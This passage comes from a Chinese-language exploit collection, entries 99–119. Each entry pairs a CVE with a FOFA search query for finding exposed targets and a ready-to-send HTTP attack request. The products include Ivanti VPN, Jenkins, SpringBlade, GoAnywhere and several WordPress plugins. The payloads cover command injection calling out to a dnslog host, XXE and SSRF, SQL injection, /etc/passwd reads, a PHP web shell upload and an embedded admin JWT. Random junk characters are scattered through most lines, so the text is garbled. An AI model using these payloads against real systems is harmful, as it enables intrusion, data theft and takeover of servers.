Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) z0 H5 X& o& ?9 [! g% aContent-Type: application/x-www-form-urlencoded; charset=UTF-8
' y( o6 a" r, K8 l. r5 ]X-Requested-With: XMLHttpRequest
# |* C0 S. i G- y& }8 }/ s8 Z; k% ^9 ], u" l
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B: i' y9 x3 A/ r B0 g2 B! O
; e* D- q- z; ~
1 Z. x5 l' _1 E& b+ F& D
99. Ncast盈可视高清智能录播系统busiFacade RCE
1 D. w) R0 J( T3 X8 QCVE-2024-03054 m8 V& s1 [, ~6 Z$ Z
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
. p6 Z, u! l1 S5 a- W. \ I% mPOST /classes/common/busiFacade.php HTTP/1.1: l: {6 V5 C" e! M0 x. g
Host: 192.168.40.130:8080
/ G3 w% \# F; K% d l" H, `! n# OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; `; v' |0 a: p6 R, S0 `1 K5 F
Connection: close. |# T7 P. g* d) j
Content-Length: 154% t- ]3 O# L7 ]. b1 D+ Z( B
Accept: */*2 z7 V& G) S+ d) X3 x. d
Accept-Encoding: gzip, deflate; s% s9 [$ b/ I1 i- D0 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 ~, m. p, o' w! J& g- a3 o! X
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
$ w- A6 n- f6 @% \& i9 g) gX-Requested-With: XMLHttpRequest
5 i; u) O# d2 [) R I, \% K5 ?& W* k# }* I
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
1 z, B2 }" I. T2 M8 a, w) ?0 I9 B0 B
9 k4 Q4 i4 e- ~( U/ l* S7 D' q$ o0 |100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传+ V6 n1 a6 J+ Q- e, y9 ]: S
CVE-2024-03523 w( o! M& K) I" d) O3 ]
FOFA:icon_hash="874152924"
/ z5 K. a! I& U# KPOST /api/file/formimage HTTP/1.1
/ R: z- M2 {5 ^; ?# c: ZHost: 192.168.40.130
+ n* ~. l. q' d& sUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
9 S1 C+ s* {( _+ S6 m" XConnection: close0 h; X9 X/ C- S( K3 [
Content-Length: 201
8 ?3 a$ B2 U( f+ C7 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei* r- Z& F3 H1 W" w* {* z8 Y p
Accept-Encoding: gzip- A. h0 A$ s- k7 h: G0 c
* q/ s' y5 b. E, I6 d. k" j. w------WebKitFormBoundarygcflwtei( W5 g6 k( S. ^$ R4 _
Content-Disposition: form-data; name="file";filename="IE4MGP.php"7 [4 _7 [% q: s: B7 u2 m
Content-Type: application/x-php
1 ?& m/ Q/ O8 ] ]- t3 {
& F x7 J& o5 @/ J2ayyhRXiAsKXL8olvF5s4qqyI2O' a% V; n; R, V$ P
------WebKitFormBoundarygcflwtei--
$ F6 U' A3 \- n4 F$ {9 ]( k1 Z# r" C) S/ D. _
- |* K( H! m! n* q5 c101. ivanti policy secure-22.6命令注入
3 `( D) Q9 I( f8 T; v2 Q, H* Q" TCVE-2024-21887: y# ]* r$ _1 t$ ?3 k! C6 I b
FOFA:body="welcome.cgi?p=logo"
, ~3 F3 R# p+ } M1 h' _ I6 r0 SGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
. q( y6 p2 b- x$ VHost: x.x.x.xx.x.x.x `' |$ B* B% Y4 K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 O4 m1 X4 u4 V1 q6 lConnection: close
# }2 R9 t( L' k7 s* h( ]5 FAccept-Encoding: gzip
/ G4 n" T2 z6 ]8 ~
/ U# ?. J5 [/ I- M# ]) [# c# k1 d: d, I) Z$ g$ d
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
" G6 Q. S7 t) TCVE-2024-21893
; g, `, Q( _& v2 ]FOFA:body="welcome.cgi?p=logo"* f6 n( @" j! M9 O# u2 o7 y
POST /dana-ws/saml20.ws HTTP/1.1- @5 O1 r) N0 X: E
Host: x.x.x.x
( v: G) h3 d7 n0 b' j0 G- `! mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* G X' d9 w& o& p
Connection: close4 U! B- H; v6 c- C; C
Content-Length: 792$ D6 V% ?, t/ j; o" H' \
Accept-Encoding: gzip
: K u0 v A$ v/ E4 b3 Q% g1 i( g! H/ c) m% g
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>% L" H8 s5 M. X
7 w' Q! X( }9 V3 v! o0 ]
103. Ivanti Pulse Connect Secure VPN XXE8 O/ `# S. e& }5 {2 f
CVE-2024-22024
, x- F: v2 V5 k0 r/ m: }! h. tFOFA:body="welcome.cgi?p=logo"9 z6 k2 s2 `! c0 O0 h9 y* ~
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
1 M* N8 v* ^* W4 [Host: 192.168.40.130:1112 j- y' m; l A! p/ O8 f1 d0 j
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; t5 r- G1 v: b- i! ^( K/ |Connection: close
7 R. f( m- S) }$ e% B k0 SContent-Length: 2041 c9 V0 H2 _* O) F5 m9 Q
Content-Type: application/x-www-form-urlencoded
% c6 N* o# K- X0 m% }Accept-Encoding: gzip
7 C; J$ V0 Y L# N' o m6 O; c# B
% \$ I) G" j) Q6 M1 aSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==1 G$ G2 y9 H/ V$ D# N
; D, |) q) `) y3 `8 o# F4 b
" r+ Y' s4 S$ y其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
& j" }, ?% u2 r. x<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
" F/ Q3 Y' Y( O
8 p7 k' [2 r3 @. T
! }) k% v5 \2 Y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露2 n" U5 D# p. ]
CVE-2024-0569
. q3 T+ D; [7 dFOFA:title="TOTOLINK"
8 A' P/ Q S+ y' @$ p+ B9 ]( tPOST /cgi-bin/cstecgi.cgi HTTP/1.1
4 D L/ {; `, C7 t3 [Host:192.168.0.1: S+ v$ y& Q/ [. S e. @+ T8 \' m
Content-Length:41
" D9 H0 Y, s9 _" J8 p; iAccept:application/json,text/javascript,*/*;q=0.01
# a( h7 X. d) U- SX-Requested-with: XMLHttpRequest8 a& n' u# ?% f9 q; Q
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36* i% l0 ?$ z. C# e. R6 }4 i) Q
Content-Type: application/x-www-form-urlencoded:charset=UTF-8. u- z7 o% m% j" Z! _8 B; E
Origin: http://192.168.0.1
( @# u4 x- }3 ^Referer: http://192.168.0.1/advance/index.html?time=1671152380564+ Q# L# K3 N+ O2 H4 \# K H1 ~
Accept-Encoding:gzip,deflate
, ~ d$ v/ g2 iAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
( D0 m }5 J# J% w* i. S. }4 L( gConnection:close
; s# ^+ r" i7 v+ T' X
, r/ K2 E/ }# p* B# C{
$ B( c1 R A% R+ j: A# y"topicurl":"getSysStatusCfg",$ E6 b5 l+ ~8 i/ g5 ?1 k$ J% p
"token":""
* C' p3 V& i+ n; {4 D9 s7 U}9 }$ i! B& ? i! T0 ~; o
5 c- p0 N/ \% l5 j) Q
105. SpringBlade v3.2.0 export-user SQL 注入* n/ B* i% _5 b4 m9 J9 }
FOFA:body="https://bladex.vip"( I" H3 n$ _# H/ y7 E
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=10 F/ [ n, J* o3 h. a5 U9 k0 }2 l
# `+ w0 P' H Y( \) h) N% c
106. SpringBlade dict-biz/list SQL 注入
+ [6 Q& ^! h- O% ^: {. s+ x1 yFOFA:body="Saber 将不能正常工作"
/ r3 B5 Q4 C4 I6 hGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1* D& O6 Q) Q) d+ A2 W/ w
Host: your-ip/ N! d& u( j1 \9 m9 H9 o V8 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- a" n3 N7 w) v5 i4 aBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
& e! s0 u) t* F1 V8 ^, N. x4 pAccept-Encoding: gzip, deflate
! Q7 m6 y) b/ c) `Accept-Language: zh-CN,zh;q=0.9
' u0 D$ X c! O4 bConnection: close; j5 n6 b( d* }7 G4 S1 j2 T
! w* X" n& |& m! P8 _0 q! b2 n0 [6 A% j0 j9 n
107. SpringBlade tenant/list SQL 注入
- H. J+ T5 l/ e8 F; u0 f3 Q3 |FOFA:body="https://bladex.vip"
( @( y3 S, _6 R" R* G p- a9 `2 T& eGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
8 M- E% S% k$ Z% l% \Host: your-ip; K4 o" F" e# }: ~8 J# j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% G1 x& N2 D o" e) O, Q% xBlade-Auth:替换为自己的
2 H2 q- Y" ~% }Connection: close
/ P1 C- w( f, k" y( Y
f& q5 } c2 u& k% O
/ Z2 ?) a7 n- ?' K R108. D-Tale 3.9.0 SSRF! h/ e, |# M# }7 d7 _
CVE-2024-21642
' U1 P$ l; y6 x, ~; v8 dFOFA:"dtale/static/images/favicon.png"! K6 {8 ~3 D, C; B
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
( ]) x0 k% w- x! XHost: your-ip
; j6 j h7 y+ y) [, yAccept: application/json, text/plain, */*
* x5 ^8 P4 b" J+ a3 E) ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 R6 ]9 M* a( `" n
Accept-Encoding: gzip, deflate, T) G. M# n% i' d# H; J
Accept-Language: zh-CN,zh;q=0.9,en;q=0.85 C9 j$ U) F. \6 S1 g) U- ]$ m) f
Connection: close
, _) c8 g% T5 Z0 o! G( K9 h8 _- d
8 l6 g1 W" w" u" X# j0 L1 B: m" b. l+ ^
109. Jenkins CLI 任意文件读取7 T" K! {/ V" I% ?' ?: r. E
CVE-2024-23897
# M: k j. P. FFOFA:header="X-Jenkins". T& a6 _) A; H9 c1 ~ v7 q v
POST /cli?remoting=false HTTP/1.1
- C' t( f, C! R- \' Z" h$ H# x2 HHost:7 U, r* L: \* V1 O Z1 X
Content-type: application/octet-stream
2 ]- y# }$ M' c3 |Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
% y7 X, M D8 o- bSide: upload/ `! R4 p4 k9 a6 [2 h
Connection: keep-alive
$ a5 [/ e) V+ f9 C1 cContent-Length: 1633 _5 Z$ L. o/ W6 U. U" X/ ?$ n! V
& D; f* h! o: w' w/ tb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
. v, V3 w X8 b7 ? `9 ]
2 y' L+ R% _) |: q7 p/ `: R# y' p L5 ^6 ^* m* A. a$ I6 T
POST /cli?remoting=false HTTP/1.11 E8 m4 q0 @; U4 c7 J
Host:
/ o z4 ], k% a1 |7 xSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 C+ b0 e% L9 ]5 K! G( z3 h6 R" Z+ _! {download
: o k$ s% M( G' p' nContent-Type: application/x-www-form-urlencoded
( G. O) L7 A, z; n/ [Content-Length: 0$ n% x$ v. G! K, S& U
' D: f- x6 g. p" y
0 Y9 z. o) E2 B8 z3 Z
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
7 |" X0 z8 J! o( @6 {! }3 k# A# ?java -jar jenkins-cli.jar help: W+ Z4 W ]% }: [; x! C' P
[COMMAND]6 e( b/ ]7 |- n
Lists all the available commands or a detailed description of single command.
- n5 K6 L8 u0 K n COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)' e4 ~' C8 m" u9 K& b4 M
) n; A/ I% b* |0 ]. O. ~4 f! L* O% S( l, @" Q0 t: \1 T+ I6 z
110. Goanywhere MFT 未授权创建管理员
+ r% L! U0 Y: j1 sCVE-2024-02040 y/ C$ a& x( h2 i2 M4 h' r
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
: \6 a/ U3 b& q. A5 ?1 GGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.13 I! v% \1 x0 ]1 ^
Host: 192.168.40.130:8000' i# H! I/ k8 \3 p. `# o K/ `; f
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36% R. q! l: m1 ^" I; \9 S( w! W
Connection: close! Q6 r6 }$ r( h8 f) P( @" L+ v
Accept: */*- {+ |. b/ ?* S. y$ J7 P; |" T
Accept-Language: en
5 z6 s _, j9 p8 L1 v2 vAccept-Encoding: gzip* K w7 r- f# e* p7 s# G+ u0 w1 T2 ?) z
+ @8 X8 k3 L3 ]8 A/ _2 z
8 P; X* s2 q/ y0 C111. WordPress Plugin HTML5 Video Player SQL注入5 B: h: Y. M7 F5 U
CVE-2024-1061- C" ?8 ]- u" {. a; v9 ^$ ~
FOFA:"wordpress" && body="html5-video-player"
+ j) ^) o9 i7 c) n2 G; xGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.10 Y( Z. e& o: |% X
Host: 192.168.40.130:112
) t* j9 L, s4 j* X1 M+ rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! F# ^0 Z! m$ u: z _, g7 zConnection: close$ A* U- Z# C( J8 M" g* D
Accept: */*
( y6 Q! ?4 T$ V X" uAccept-Language: en
* V9 U2 j' {% X' m( _+ mAccept-Encoding: gzip
; o, K5 i1 h$ |4 `% [; p+ X+ Z3 `; |- j# l
" ]) R6 Y" n2 [0 H2 h6 w, F4 V112. WordPress Plugin NotificationX SQL 注入( h7 ^) L; F1 f8 t' ~
CVE-2024-1698" l( K' f5 H. P2 d5 D: [
FOFA:body="/wp-content/plugins/notificationx"
2 t8 S2 T1 e3 [, x: Z! w' S: d# tPOST /wp-json/notificationx/v1/analytics HTTP/1.1
/ ~) ]# G3 A" P7 k% F GHost: {{Hostname}}
8 y* W) Q0 l: \" G. xContent-Type: application/json
9 E _1 j0 I& L9 ?; `0 B: A" a% t5 L
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
j: N2 ]0 Q- S5 v, w& s; A9 K0 n$ }7 i# Y" m7 f
( y/ m2 [8 `, R113. WordPress Automatic 插件任意文件下载和SSRF/ X5 u2 c1 X- J
CVE-2024-27954, \4 J* Y. B) w' O5 g* M6 e
FOFA:"/wp-content/plugins/wp-automatic"
8 c+ K$ S( m, G5 q* P# ]% LGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
1 a9 p) O; h% K+ cHost: x.x.x.x
4 }6 l5 R" ~6 Y2 jUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
. v! x$ Q" y. {9 vConnection: close9 M$ C/ u: t% B' b
Accept: */*
# b; E5 B8 O7 z8 zAccept-Language: en
4 N7 @3 ^/ g4 P( \6 U# [1 f8 RAccept-Encoding: gzip. m0 \- V! w+ U* f
& ]" \7 [3 E7 E4 a
$ k. ]# m& z' j& a: \* W2 b+ I8 ?114. WordPress MasterStudy LMS插件 SQL注入
( s, C( V4 R7 o zFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"- B# O4 I5 G& z; g" J. F
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.12 O3 Y" q* y) y. d# i
Host: your-ip& u% W! Q2 a3 z: q; F
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 I9 V! b. |- v4 u
Accept-Charset: utf-8
; d$ v. B1 }2 l4 W/ x t* X* xAccept-Encoding: gzip, deflate$ w- P! w* _# g; o
Connection: close
' b9 ?4 B$ L4 M* y. `' Y- {( n. w0 E* [- ^2 S$ }( `' w
7 O3 }% {7 `$ _2 S115. WordPress Bricks Builder <= 1.9.6 RCE
" {$ o* X" Y, N% K1 u' ECVE-2024-25600
3 G- |4 A$ W% f( }# a( @ mFOFA: body="/wp-content/themes/bricks/") e5 W+ X0 `, `2 o5 L$ d3 e
第一步,获取网站的nonce值
# d2 _7 Q' n* W- g8 {, [; YGET / HTTP/1.13 _+ ]& ]- ~/ ~) h: ~
Host: x.x.x.x# e1 Y8 T) P9 W# w) e' |. T
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
5 I6 Z9 Z `( aConnection: close( C9 C; v5 P- Z: a2 l3 X" c
Accept-Encoding: gzip) ^* _9 r# I* `4 R! i A/ ?
0 T1 |+ D) G" E$ j. H9 E% o
$ |! T# k. K Y( a
第二步替换nonce值,执行命令* I9 _6 s: ^4 U, h
POST /wp-json/bricks/v1/render_element HTTP/1.19 v% _& x2 x0 T2 q* \
Host: x.x.x.x
& i# l7 `% l# l7 [! C6 C5 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 u- Y1 F$ J; x# f; |Connection: close6 I6 u' d; _ L* c3 i4 k6 ~, M* d
Content-Length: 356
0 {6 M6 y' ^+ b& iContent-Type: application/json0 x' z/ ~9 S. \: |
Accept-Encoding: gzip# ]( [' z0 E6 p$ S
- x- g. T" t+ T8 r- L- i( F5 X
{
/ W7 H! W. C5 H2 g" ^! j( E"postId": "1",3 F! `) o8 [( h" P" K8 M
"nonce": "第一步获得的值",+ T6 K8 ?2 F2 d! q2 ~$ j
"element": {3 r2 z5 p0 A+ M8 H2 S2 W
"name": "container"," ]3 F* L# S/ `8 l
"settings": {0 {' x& M$ M% L1 \6 }2 P' ?
"hasLoop": "true",
0 N4 n, f, z" `& b" A$ j, z8 G1 L "query": {) G1 C( d. I# {; l
"useQueryEditor": true,
! g/ t4 x" w0 y "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
& P J! H# X; R9 K/ w "objectType": "post". O: O5 H1 l; ]% q* J
}
; A3 t6 X; H1 l2 U }
) d2 J5 l" ?# u: @2 j0 ` } O' }1 r4 X. u4 @
}" }, ]$ b% N9 P
" E/ Q( f% Z; T0 ]* t1 ?. l- s O9 G B# ?* P. x/ D. L
116. wordpress js-support-ticket文件上传. N; k7 K; h2 ~9 |8 k8 O5 w
FOFA:body="wp-content/plugins/js-support-ticket", a; U8 i; ]+ R; \
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
9 K0 y3 x+ H! P' ?Host:
1 P( A6 Z6 R+ x4 r$ w' aContent-Type: multipart/form-data; boundary=--------767099171
; z2 E: {$ ~4 ~/ z$ C, [, K: p9 VUser-Agent: Mozilla/5.0
, x) c1 |4 N" O- K5 {( L. c1 V; G$ G3 o
----------767099171
2 b4 T0 z( d9 @( s, ]Content-Disposition: form-data; name="action"
* A* I$ H/ M: W1 Dconfiguration_saveconfiguration2 k$ h9 C, I' f8 m6 S& M8 M* ?
----------767099171
5 a: S7 w3 h- GContent-Disposition: form-data; name="form_request"
9 l/ L+ e& G4 }/ k3 e9 Y# Vjssupportticket
" ?3 K J0 x8 L$ k----------767099171
" p G* l' h j& H7 N6 D, c! [" l2 NContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php") a* d# P0 v) ?0 ?* E! ]# d0 [ h+ ?# ?
Content-Type: image/png/ O2 g; w* d0 U/ Y7 k3 [2 N
----------767099171--+ u5 x; x' J- a0 u5 V
8 y% Q& n% E7 H1 K+ l
* P, I; N. s! Q9 y6 W( W4 }
117. WordPress LayerSlider插件SQL注入; i5 A. i- n0 q; c) N" k
version:7.9.11 – 7.10.0+ X" @# b* G8 R1 U K
FOFA:body="/wp-content/plugins/LayerSlider/"
! O4 B1 [! z+ A6 |0 PGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.10 }3 s. h/ M/ i. K% F
Host: your-ip
1 `) l9 m* C" zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( I1 ]1 n+ b1 P7 j" a+ V/ I- q8 {7 P2 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 s6 `8 G) `) M( `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- z/ F( h# _) J% IAccept-Encoding: gzip, deflate, br7 k8 q/ ^8 B# w+ ^. Z$ }# B
Connection: close
- K+ `+ e/ V! Z. r( a; ?Upgrade-Insecure-Requests: 1- M) e$ ?' ?3 [
7 j& ^1 F( \, k; W( K6 C
2 e% y- V+ w A8 v/ a) c
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
# _/ e9 H4 w( D% b& o1 xCVE-2024-0939, M; s O5 z: H
FOFA:title="Smart管理平台"
: \1 |+ L6 ^2 |( S2 JPOST /Tool/uploadfile.php? HTTP/1.1
5 Z! a& g8 n7 w. g- gHost: 192.168.40.130:8443
' t9 _8 S& y! Y/ ~6 i& b) HCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8# W5 h& y0 \8 h x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
2 q. T$ ?" P f& \0 _' z& ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- D' O# O& g# e* v+ k( ]8 _4 `0 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 o& S2 L& K% n; r
Accept-Encoding: gzip, deflate' i9 I4 F0 G, P0 S) R6 X0 l9 M; u
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
: G6 ~. w+ M* m5 U% W" K: T. XContent-Length: 4052 Q' f3 [: R% G/ S8 q( E, _* F
Origin: https://192.168.40.130:84436 Q: n) S' P% j
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
0 j1 {1 \8 M1 P" yUpgrade-Insecure-Requests: 1
* @1 Q, X: b( U! @+ PSec-Fetch-Dest: document9 D* \) R1 h' v) V
Sec-Fetch-Mode: navigate
+ x% g U$ g1 B0 b! mSec-Fetch-Site: same-origin/ c/ X) L- [7 W; v, h8 C
Sec-Fetch-User: ?1
; `2 t3 e! K: X7 d# QTe: trailers* a/ L' F/ O0 _$ e
Connection: close) U s; V1 |5 m; p; T: l
8 s3 l. L( o2 s$ b6 R/ h
-----------------------------13979701222747646634037182887; n& z) i6 O" r) Z* u
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
9 Y- Y. `! |) [% [9 v" yContent-Type: application/octet-stream
3 k( U6 t5 k/ V+ ?! C4 z M' ^8 f$ v- V1 t
<?php
- F+ r7 |! i* @! Lsystem($_POST["passwd"]);
E7 c1 [1 `* S$ C2 L5 D1 N?>8 G' v/ l$ {7 m1 I5 b/ t
-----------------------------139797012227476466340371828874 ^5 G) B- C9 N
Content-Disposition: form-data; name="txt_path") G r% v& X7 B$ A5 s. T
" M4 q+ d- v( c2 n0 @/home/src.php
$ t* G9 R- A0 W-----------------------------13979701222747646634037182887--- e! s+ U+ W6 o/ i" Y
' a9 t9 Z" X3 m/ c& F' |% T; {7 d8 h$ h
访问/home/src.php' l6 C c; _- z7 I! G5 n' D
' G' T% Z$ }: F2 Z119. 北京百绰智能S20后台sysmanageajax.php sql注入+ h- Y) R3 g! @! Y' _$ `
CVE-2024-1254
0 f5 V% U1 y& X+ b1 A! V+ ~# IFOFA:title="Smart管理平台"
1 y5 G2 n9 Q) e先登录进入系统,默认账号密码为admin/admin
3 O; c$ V5 `6 H4 M2 P4 ePOST /sysmanage/sysmanageajax.php HTTP/1.11
# l/ R& D6 J* Q L% {, d" x7 `Host: x.x.x.x
2 Z# p/ d' p) BCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee. C" l1 B* d+ N! ~ |' e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 s0 j" Q* w2 c# {# yAccept: */*
4 r4 I4 v8 r( b. I% b4 a: uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. n( j! ]; ?- x" L# `1 y7 B, uAccept-Encoding: gzip, deflate4 V J7 l! B/ L: ^. s# \. J
Content-Type: application/x-www-form-urlencoded;% N, u5 ~7 Q8 A- w$ Q: f6 \
Content-Length: 109
8 M! M) }. E$ F0 WOrigin: https://58.18.133.60:8443& Q" ? W3 Y2 m) Z& C
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php% m! c q& R3 ?. P; K" C
Sec-Fetch-Dest: empty
6 r2 B. Q! K9 a) p/ _; l; g$ \1 CSec-Fetch-Mode: cors# X& W# @8 S% I
Sec-Fetch-Site: same-origin4 x. g9 b% F, v. `' |- _
X-Forwarded-For: 1.1.1.1
. ~8 j0 ?6 \2 t# ?X-Originating-Ip: 1.1.1.1/ n+ G* I6 n2 W/ O& B
X-Remote-Ip: 1.1.1.1
; f* |2 \7 [) w6 O, FX-Remote-Addr: 1.1.1.1% v5 H7 }- h$ x6 _, @4 R' _
Te: trailers2 ]1 f9 J$ {1 d' T( ~0 L
Connection: close+ o6 \, s' F4 R" }9 c+ |$ n* Y
